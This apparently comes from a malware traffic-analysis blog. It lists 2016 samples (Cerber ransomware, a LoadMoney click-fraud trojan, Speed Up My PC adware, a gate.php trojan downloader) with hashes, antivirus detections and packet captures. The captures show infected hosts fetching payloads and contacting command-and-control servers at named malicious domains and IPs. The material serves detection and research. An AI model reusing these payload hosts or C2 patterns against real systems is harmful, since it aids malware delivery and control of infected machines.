p.exe Loads Ransomware Cerber Variant 91.190.218.63 40.117.145.132 443 PCAP File Download Traffic Analysis

SHA256: 71b2f1c5642d24c7f35479399c96cc572b1f0a24d4843ed0fddbf93af12d59c3
File name: p.exe
Detection ratio: 36 / 56
Analysis date: 2016-11-27 00:03:46 UTC
GData Trojan.GenericKD.3764705 20161127
Ikarus Trojan.Win32.Filecoder 20161126
Invincea virus.win32.sality.at 20161018
K7GW Trojan ( 004e16c11 ) 20161127
Kaspersky Trojan.Win32.Inject.acgan 20161127
Malwarebytes Trojan.MalPack.NSIS 20161127
McAfee Artemis!81D6AF74652B 20161127
McAfee-GW-Edition BehavesLike.Win32.Ransom.cc 20161126
eScan Trojan.GenericKD.3764705 20161127
Microsoft Ransom:Win32/Cerber 20161126
Panda Trj/Genetic.gen 20161126
Qihoo-360 HEUR/QVM20.1.6872.Malware.Gen 20161127
Sophos Mal/Generic-S 20161127
Symantec Trojan.Gen 20161127
Tencent Win32.Trojan.Inject.Auto 20161127
TrendMicro-HouseCall TROJ_GEN.R047H09KP16 20161127
VIPRE Trojan.Win32.Generic!BT 20161126
nProtect Ransom/W32.Cerber.163103 20161126

2016-11-26 17:43:28.144466 IP 192.168.1.102.51195 > 203.162.253.20.80: Flags [P.], seq 0:376, ack 1, win 256, length 376: HTTP: GET /p.exe HTTP/1.1
GET /p.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
If-Modified-Since: Fri, 25 Nov 2016 10:44:39 GMT
If-None-Match: "400fc-27d1f-5421dcf159061"
Host: 203.162.253.20
Connection: Keep-Alive

2016-11-26 17:43:28.413173 IP 192.168.1.102.51195 > 203.162.253.20.80: Flags [F.], seq 376, ack 153, win 256, length 0
2016-11-26 17:43:28.413507 IP 192.168.1.102.51195 > 203.162.253.20.80: Flags [.], ack 154, win 256, length 0
2016-11-26 17:43:30.660646 IP 192.168.1.102.51177 > 40.117.145.132.443: Flags [P.], seq 2656244277:2656244730, ack 2896471773, win 32665, length 453
2016-11-26 17:43:30.660768 IP 192.168.1.102.51177 > 40.117.145.132.443: Flags [P.], seq 453:1482, ack 1, win 32665, length 1029
2016-11-26 17:43:31.508088 IP 192.168.1.102.51177 > 40.117.145.132.443: Flags [.], ack 358, win 32620, length 0
2016-11-26 17:43:34.260439 IP 192.168.1.102.59393 > 192.168.1.111.3074: UDP, length 52
2016-11-26 17:43:34.311136 IP 192.168.1.111.3074 > 192.168.1.102.59393: UDP, length 52
2016-11-26 17:43:34.418756 IP 192.168.1.102.59393 > 192.168.1.111.3074: UDP, length 52
2016-11-26 17:43:35.871629 IP 192.168.1.102.54451 > 75.75.75.75.53: 37685+ A? wpad.hsd1.md.comcast.net. (42)
2016-11-26 17:43:43.691442 IP 192.168.1.102.43887 > 41.218.223.2.26881: UDP, length 18
2016-11-26 17:43:44.599775 IP 192.168.1.102.51152 > 91.190.218.63.443: Flags [.], ack 4120564365, win 256, length 0
2016-11-26 17:43:44.600056 IP 192.168.1.102.51152 > 91.190.218.63.443: Flags [F.], seq 0, ack 1, win 256, length 0
2016-11-26 17:43:44.832551 IP 192.168.1.102.51170 > 40.122.162.208.443: Flags [R.], seq 4268482331, ack 2518277989, win 0, length 0
2016-11-26 17:43:44.832961 IP 192.168.1.102.51163 > 157.56.52.40.40012: Flags [P.], seq 2141827235:2141827479, ack 1684209167, win 256, length 244
2016-11-26 17:43:44.833430 IP 192.168.1.102.51163 > 157.56.52.40.40012: Flags [P.], seq 244:260, ack 1, win 256, length 16
2016-11-26 17:43:44.971065 IP 192.168.1.102.51163 > 157.56.52.40.40012: Flags [.], ack 5, win 256, length 0

Snurrepin.com Delivers doc.exe CERBER Ransomware Malware PCAP File Download Traffic Analysis

SHA256: 69e6f40fa4231edb47d52b5a19de15720b3e5fc19f68bb3060e9b6e06c307d42
File name: doc.exe
Detection ratio: 9 / 56
Analysis date: 2016-11-26 23:56:21 UTC
CrowdStrike Falcon (ML) malicious_confidence_75% (W) 20161024
ESET-NOD32 NSIS/Injector.KT 20161126
Invincea virus.win32.sality.at 20161018
Kaspersky UDS:DangerousObject.Multi.Generic 20161127
McAfee Artemis!4D4D6D2C7CC6 20161127
McAfee-GW-Edition BehavesLike.Win32.Downloader.dc 20161126
Qihoo-360 HEUR/QVM42.0.0000.Malware.Gen 20161127
Rising Malware.FakePDF@CV!1.6AC1-LyO8PTdeqgK (cloud) 20161126
Symantec Ransom.Cerber 20161127

2016-11-26 17:05:51.661059 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [P.], seq 0:392, ack 1, win 256, length 392: HTTP: GET /doc.exe HTTP/1.1
GET /doc.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=214078-
Unless-Modified-Since: Sat, 26 Nov 2016 19:38:19 GMT
If-Range: "46448-54239617f5e88"
Host: snurrepin.com
Connection: Keep-Alive

2016-11-26 17:06:03.817526 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [.], ack 555, win 256, length 0
2016-11-26 17:06:06.750700 IP 192.168.1.102.50494 > 208.109.4.49.443: Flags [F.], seq 1829, ack 4858, win 257, length 0
2016-11-26 17:06:06.750911 IP 192.168.1.102.50483 > 208.109.4.218.80: Flags [F.], seq 274, ack 669, win 256, length 0
2016-11-26 17:06:06.751057 IP 192.168.1.102.50486 > 23.64.73.112.443: Flags [F.], seq 2487, ack 225525, win 256, length 0
2016-11-26 17:06:06.751180 IP 192.168.1.102.50493 > 23.64.73.112.443: Flags [F.], seq 1584, ack 172165, win 256, length 0
2016-11-26 17:06:06.752556 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [F.], seq 392, ack 74057, win 256, length 0
2016-11-26 17:06:06.752624 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [F.], seq 878, ack 555, win 256, length 0
2016-11-26 17:06:06.752691 IP 192.168.1.102.50492 > 23.64.73.112.443: Flags [F.], seq 1882, ack 75023, win 256, length 0
2016-11-26 17:06:06.752880 IP 192.168.1.102.50487 > 23.64.73.112.443: Flags [F.], seq 2817, ack 394566, win 695, length 0
2016-11-26 17:06:06.784774 IP 192.168.1.102.50486 > 23.64.73.112.443: Flags [R.], seq 2488, ack 225554, win 0, length 0
2016-11-26 17:06:06.785440 IP 192.168.1.102.50492 > 23.64.73.112.443: Flags [R.], seq 1883, ack 75052, win 0, length 0
2016-11-26 17:06:06.793362 IP 192.168.1.102.50487 > 23.64.73.112.443: Flags [R.], seq 2818, ack 394595, win 0, length 0
2016-11-26 17:06:06.793768 IP 192.168.1.102.50493 > 23.64.73.112.443: Flags [R.], seq 1585, ack 172194, win 0, length 0
2016-11-26 17:06:06.833382 IP 192.168.1.102.50494 > 208.109.4.49.443: Flags [.], ack 4859, win 257, length 0
2016-11-26 17:06:06.838734 IP 192.168.1.102.50508 > 208.109.4.49.443: Flags [.], ack 556, win 256, length 0
2016-11-26 17:06:06.839238 IP 192.168.1.102.50483 > 208.109.4.218.80: Flags [.], ack 670, win 256, length 0
2016-11-26 17:06:06.991510 IP 192.168.1.102.50496 > 89.33.242.29.80: Flags [.], ack 74058, win 256, length 0
2016-11-26 17:06:12.808611 IP 192.168.1.102.56893 > 192.168.0.0.6892: UDP, length 10
2016-11-26 17:06:12.808689 IP 192.168.1.102.56893 > 192.168.0.1.6892: UDP, length 10
2016-11-26 17:06:12.808695 IP 192.168.1.102.56893 > 192.168.0.2.6892: UDP, length 10
2016-11-26 17:06:12.808741 IP 192.168.1.102.56893 > 192.168.0.3.6892: UDP, length 10
2016-11-26 17:06:12.808826 IP 192.168.1.102.56893 > 192.168.0.4.6892: UDP, length 10
2016-11-26 17:06:12.808832 IP 192.168.1.102.56893 > 192.168.0.5.6892: UDP, length 10
2016-11-26 17:06:12.808878 IP 192.168.1.102.56893 > 192.168.0.6.6892: UDP, length 10
2016-11-26 17:06:12.808961 IP 192.168.1.102.56893 > 192.168.0.7.6892: UDP, length 10

2016-11-26 17:06:12.810660 IP 192.168.1.102.56893 > 194.165.16.13.6892: UDP, length 10
2016-11-26 17:06:12.810755 IP 192.168.1.102.56893 > 194.165.16.14.6892: UDP, length 10
2016-11-26 17:06:12.810761 IP 192.168.1.102.56893 > 194.165.16.15.6892: UDP, length 10
2016-11-26 17:06:12.810837 IP 192.168.1.102.56893 > 194.165.16.16.6892: UDP, length 10
2016-11-26 17:06:12.810842 IP 192.168.1.102.56893 > 194.165.16.17.6892: UDP, length 10
2016-11-26 17:06:12.810887 IP 192.168.1.102.56893 > 194.165.16.18.6892: UDP, length 10
2016-11-26 17:06:12.810972 IP 192.168.1.102.56893 > 194.165.16.19.6892: UDP, length 10
2016-11-26 17:06:12.811021 IP 192.168.1.102.56893 > 194.165.16.20.6892: UDP, length 10
2016-11-26 17:06:12.811026 IP 192.168.1.102.56893 > 194.165.16.21.6892: UDP, length 10
2016-11-26 17:06:12.811078 IP 192.168.1.102.56893 > 194.165.16.22.6892: UDP, length 10
2016-11-26 17:06:12.811153 IP 192.168.1.102.56893 > 194.165.16.23.6892: UDP, length 10
2016-11-26 17:06:12.811158 IP 192.168.1.102.56893 > 194.165.16.24.6892: UDP, length 10
2016-11-26 17:06:12.811203 IP 192.168.1.102.56893 > 194.165.16.25.6892: UDP, length 10
2016-11-26 17:06:12.811273 IP 192.168.1.102.56893 > 194.165.16.26.6892: UDP, length 10
2016-11-26 17:06:12.811330 IP 192.168.1.102.56893 > 194.165.16.27.6892: UDP, length 10
2016-11-26 17:06:12.811380 IP 192.168.1.102.56893 > 194.165.16.28.6892: UDP, length 10
2016-11-26 17:06:12.811385 IP 192.168.1.102.56893 > 194.165.16.29.6892: UDP, length 10
2016-11-26 17:06:12.811438 IP 192.168.1.102.56893 > 194.165.16.30.6892: UDP, length 10
2016-11-26 17:06:12.811511 IP 192.168.1.102.56893 > 194.165.16.31.6892: UDP, length 10
2016-11-26 17:06:12.811516 IP 192.168.1.102.56893 > 194.165.16.32.6892: UDP, length 10
2016-11-26 17:06:12.811563 IP 192.168.1.102.56893 > 194.165.16.33.6892: UDP, length 10
2016-11-26 17:06:12.811645 IP 192.168.1.102.56893 > 194.165.16.34.6892: UDP, length 10
2016-11-26 17:06:12.811650 IP 192.168.1.102.56893 > 194.165.16.35.6892: UDP, length 10
2016-11-26 17:06:12.811698 IP 192.168.1.102.56893 > 194.165.16.36.6892: UDP, length 10
2016-11-26 17:06:12.811779 IP 192.168.1.102.56893 > 194.165.16.37.6892: UDP, length 10

Graftor LoadMoney 185.20.186.52 Malware Trojan Clickfraud PCAP File Download Traffic Analysis

SHA256: 572b756cd5cfda893c5e32f7bdcb4e44d57e7101b507afcdee8646b3417fe6e3
File name: autorun.exe
Detection ratio: 47 / 56
Analysis date: 2016-11-26 23:22:55 UTC
AhnLab-V3 PUP/Win32.LoadMoney.C1370399 20161126
Antiy-AVL Trojan[:HEUR]/Win32.AGeneric 20161126
Arcabit Trojan.Graftor.D42051 20161126
Avast Win32:Malware-gen 20161126
Avira (no cloud) APPL/Agent.755 20161126
BitDefender Gen:Variant.Graftor.270417 20161126
CAT-QuickHeal Trojan.Mupad 20161126
Comodo ApplicUnwnt.Win32.RuKometa.~A 20161126
CrowdStrike Falcon (ML) malicious_confidence_68% (D) 20161024
Cyren W32/Selfdel.N 20161127
DrWeb Trojan.LoadMoney.1377 20161127
ESET-NOD32 a variant of Win32/RuKometa.E potentially unwanted 20161126
Emsisoft Gen:Variant.Graftor.270417 (B) 20161127
F-Prot W32/Selfdel.N 20161127
F-Secure Gen:Variant.Graftor.270417 20161127
Fortinet W32/SelfDel.BTBP!tr 20161127
GData Gen:Variant.Graftor.270417

2016-11-26 17:34:54.019260 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [P.], seq 0:386, ack 1, win 256, length 386: HTTP: GET /autorun.exe HTTP/1.1
GET /autorun.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
If-Modified-Since: Thu, 07 Apr 2016 10:57:14 GMT
If-None-Match: "57063d0a-30a50"
Host: uhfoeujcqfoihdi.referparty.ru
Connection: Keep-Alive

2016-11-26 17:34:54.169528 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [.], ack 172, win 255, length 0
2016-11-26 17:34:54.171251 IP 192.168.1.102.51015 > 82.118.16.96.80: Flags [F.], seq 386, ack 172, win 255, length 0
2016-11-26 17:34:57.514854 IP 192.168.1.102.62604 > 75.75.75.75.53: 25856+ A? crl.usertrust.com. (35)
2016-11-26 17:34:57.536654 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [S], seq 1392431157, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2016-11-26 17:34:57.572643 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [.], ack 1689782253, win 256, length 0
2016-11-26 17:34:57.573155 IP 192.168.1.102.51016 > 178.255.83.2.80: Flags [P.], seq 0:198, ack 1, win 256, length 198: HTTP: GET /AddTrustExternalCARoot.crl HTTP/1.1
GET /AddTrustExternalCARoot.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: crl.usertrust.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2016-11-26 17:35:01.948228 IP 192.168.1.102.51018 > 185.20.186.52.80: Flags [P.], seq 0:488, ack 1, win 256, length 488: HTTP: GET /%f3%07%27%f6%46%d3%16%57%47%f6%27%57%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%23%03%62%76%57%96%46%d3%23%83%93%63%93%26%16%03%66%63%33%83%43%23%73%36%83%56%83%26%23%66%53%33%63%56%93%13%73%66%33%63%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
GET /%f3%07%27%f6%46%d3%16%57%47%f6%27%57%e6%62%67%56%27%37%96%f6%e6%d3%33%e2%23%03%62%76%57%96%46%d3%23%83%93%63%93%26%16%03%66%63%33%83%43%23%73%36%83%56%83%26%23%66%53%33%63%56%93%13%73%66%33%63%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: autorun 3.20
Host: g.azmagis.ru
Cache-Control: no-cache

speedupmypc.exe Speed Up My PC PUP Adware Riskware Bundler PCAP File Download Traffic Sample

SHA256: fd399751ceb5ed4c25d690f2f10aabeb4dfad6341714029c24748df0481963f0
File name: speedupmypc.exe
Detection ratio: 15 / 56
Analysis date: 2016-11-16 04:24:21 UTC
AVG PCSB.C 20161116
AVware Trojan.Win32.Generic!BT 20161116
AegisLab W32.Application.Uniblue!c 20161116
DrWeb Program.Unwanted.1514 20161116
ESET-NOD32 Win32/SpeedUpMyPC.A potentially unwanted 20161116
Fortinet Riskware/SpeedUpMyPC 20161116
GData Win32.Application.Uniblue.A 20161116
Ikarus PUA.Uniblue 20161115
Invincea virus.win32.sality.at 20161018
K7AntiVirus Adware ( 004bb0441 ) 20161115
K7GW Adware ( 004bb0441 ) 20161116
Malwarebytes PUP.Optional.Uniblue 20161116
McAfee-GW-Edition BehavesLike.Win32.Obfuscated.tc 20161116
SUPERAntiSpyware PUP.SpeedUpMyPC/Variant 20161116
VIPRE Trojan.Win32.Generic!BT 20161116

2016-11-15 18:43:07.173960 IP 192.168.1.102.52775 > 107.20.189.243.80: Flags [P.], seq 0:342, ack 1, win 256, length 342: HTTP: GET /cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe HTTP/1.1
GET /cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: download.uniblue.com
Connection: Keep-Alive

2016-11-15 18:43:07.211074 IP 192.168.1.102.63208 > 75.75.75.75.53: 51033+ A? files.uniblue.com. (35)

2016-11-15 18:43:07.268182 IP 192.168.1.102.52776 > 52.216.1.203.80: Flags [P.], seq 0:461, ack 1, win 257, length 461: HTTP: GET /cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe HTTP/1.1
GET /cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: files.uniblue.com
Connection: Keep-Alive
Range: bytes=451813-
Unless-Modified-Since: Tue, 19 Jul 2016 16:26:19 GMT
If-Range: "3f2ec3ba48632a2368c774747fb9ad58"


2016-11-15 18:43:10.845116 IP 192.168.1.102.52777 > 23.52.85.163.80: Flags [P.], seq 0:173, ack 1, win 256, length 173: HTTP: GET /sf.crl HTTP/1.1
GET /sf.crl HTTP/1.1
Accept: */*
User-Agent: Microsoft-CryptoAPI/5.131.2600.5512
Host: sf.symcb.com
Connection: Keep-Alive
Cache-Control: no-cache
Pragma: no-cache

2016-11-15 18:43:10.868334 IP 192.168.1.102.52777 > 23.52.85.163.80: Flags [.], ack 2921, win 256, length 0

2016-11-15 18:43:15.554941 IP 192.168.1.102.52778 > 54.247.81.186.80: Flags [P.], seq 0:410, ack 1, win 256, length 410: HTTP: POST /v1/collect HTTP/1.1
POST /v1/collect HTTP/1.1
Content-Type: application/json
Content-Length: 192
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: tracking.uniblue.com
Connection: Keep-Alive

{"recipient":"uniblue.sp-6_0_15_0.web","client_id":"","event":"prod.sp.mypcbackup_offer_included.cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe","buildtest_id":"","unit_id":"740"}
2016-11-15 18:43:15.593326 IP 192.168.1.102.52780 > 54.247.81.186.80: Flags [S], seq 1602288928, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

2016-11-15 18:43:42.475266 IP 192.168.1.102.52780 > 54.247.81.186.80: Flags [P.], seq 1208:1630, ack 526, win 254, length 422: HTTP: POST /v1/collect HTTP/1.1
POST /v1/collect HTTP/1.1
Content-Type: application/json
Content-Length: 204
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: tracking.uniblue.com
Connection: Keep-Alive

{"recipient":"uniblue.sp-6_0_15_0.web","client_id":"","event":"prod.sp.install_standalone_download_completed.cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe","buildtest_id":"","unit_id":"740"}
2016-11-15 18:43:42.672871 IP 192.168.1.102.52780 > 54.247.81.186.80: Flags [.], ack 701, win 253, length 0

2016-11-15 18:43:48.292481 IP 192.168.1.102.52787 > 176.34.230.166.80: Flags [P.], seq 0:408, ack 1, win 256, length 408: HTTP: POST /v1/collect HTTP/1.1
POST /v1/collect HTTP/1.1
Content-Type: application/json
Content-Length: 190
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: tracking.uniblue.com
Connection: Keep-Alive

{"recipient":"uniblue.sp-6_0_15_0.standalone","client_id":"","event":"prod.sp.install_launched.cm/afterdownload/speedupmypc/uk-mpu-1/setup/speedupmypc.exe","buildtest_id":"","unit_id":"740"}
2016-11-15 18:43:48.509108 IP 192.168.1.102.52787 > 176.34.230.166.80: Flags [.], ack 176, win 255, length 0

2016-11-15 18:43:49.461154 IP 192.168.1.102.52786 > 176.34.230.166.80: Flags [P.], seq 0:419, ack 1, win 256, length 419: HTTP: POST /v1/collect HTTP/1.1
POST /v1/collect HTTP/1.1
Content-Type: application/json
Content-Length: 201
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: tracking.uniblue.com
Connection: Keep-Alive

microsoftsup.com POST /gate.php Trojan Malware Downloader PCAP file download traffic sample

SHA256: 55754d7bc221d58cebc24daeb3476fa2dbfdaf6ab75e9d3a30456dd5cbf589e5
File name: 2.exe
Detection ratio: 49 / 56
Analysis date: 2016-11-16 03:38:39 UTC
ALYac Trojan.Generic.19684864 20161116
AVG Win32/Blacked 20161116
AVware Trojan.Win32.Generic!BT 20161116
Ad-Aware Trojan.Generic.19684864 20161116
AegisLab Troj.W32.Generic!c 20161116
AhnLab-V3 Trojan/Win32.Generic.N2111031230 20161116
Antiy-AVL Trojan[:HEUR]/Win32.AGeneric 20161116
Arcabit Trojan.Generic.D12C5E00 20161116
Avast Win32:Adware-gen [Adw] 20161116
Avira (no cloud) TR/Black.Gen2 20161116
Baidu Win32.Packed.VMProtect.a 20161115
BitDefender Trojan.Generic.19684864 20161116
Bkav HW32.Packed.509F 20161112
CAT-QuickHeal TrojanPWS.Fareit 20161115
ClamAV Win.Trojan.Generic-1750 20161116
Comodo UnclassifiedMalware 20161116
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20161024
Cyren

2016-11-15 19:21:22.301485 IP 192.168.1.102.53489 > 59.188.68.200.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /down/2.exe HTTP/1.1
GET /down/2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down.microsoftsup.com
Connection: Keep-Alive

2016-11-15 19:21:22.559324 IP 192.168.1.102.53489 > 59.188.68.200.80: Flags [.], ack 1, win 256, options [nop,nop,sack 1 {1461:2921}], length 0

2016-11-15 19:21:36.592725 IP 192.168.1.102.53491 > 59.188.68.200.80: Flags [P.], seq 0:272, ack 1, win 256, length 272: HTTP: POST /Panel/gate.php HTTP/1.0
POST /Panel/gate.php HTTP/1.0
Host: a.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 337
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)


2016-11-15 19:21:37.954398 IP 192.168.1.102.53492 > 59.188.68.200.80: Flags [P.], seq 0:183, ack 1, win 256, length 183: HTTP: GET /down/1.exe HTTP/1.0
GET /down/1.exe HTTP/1.0
Host: down.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)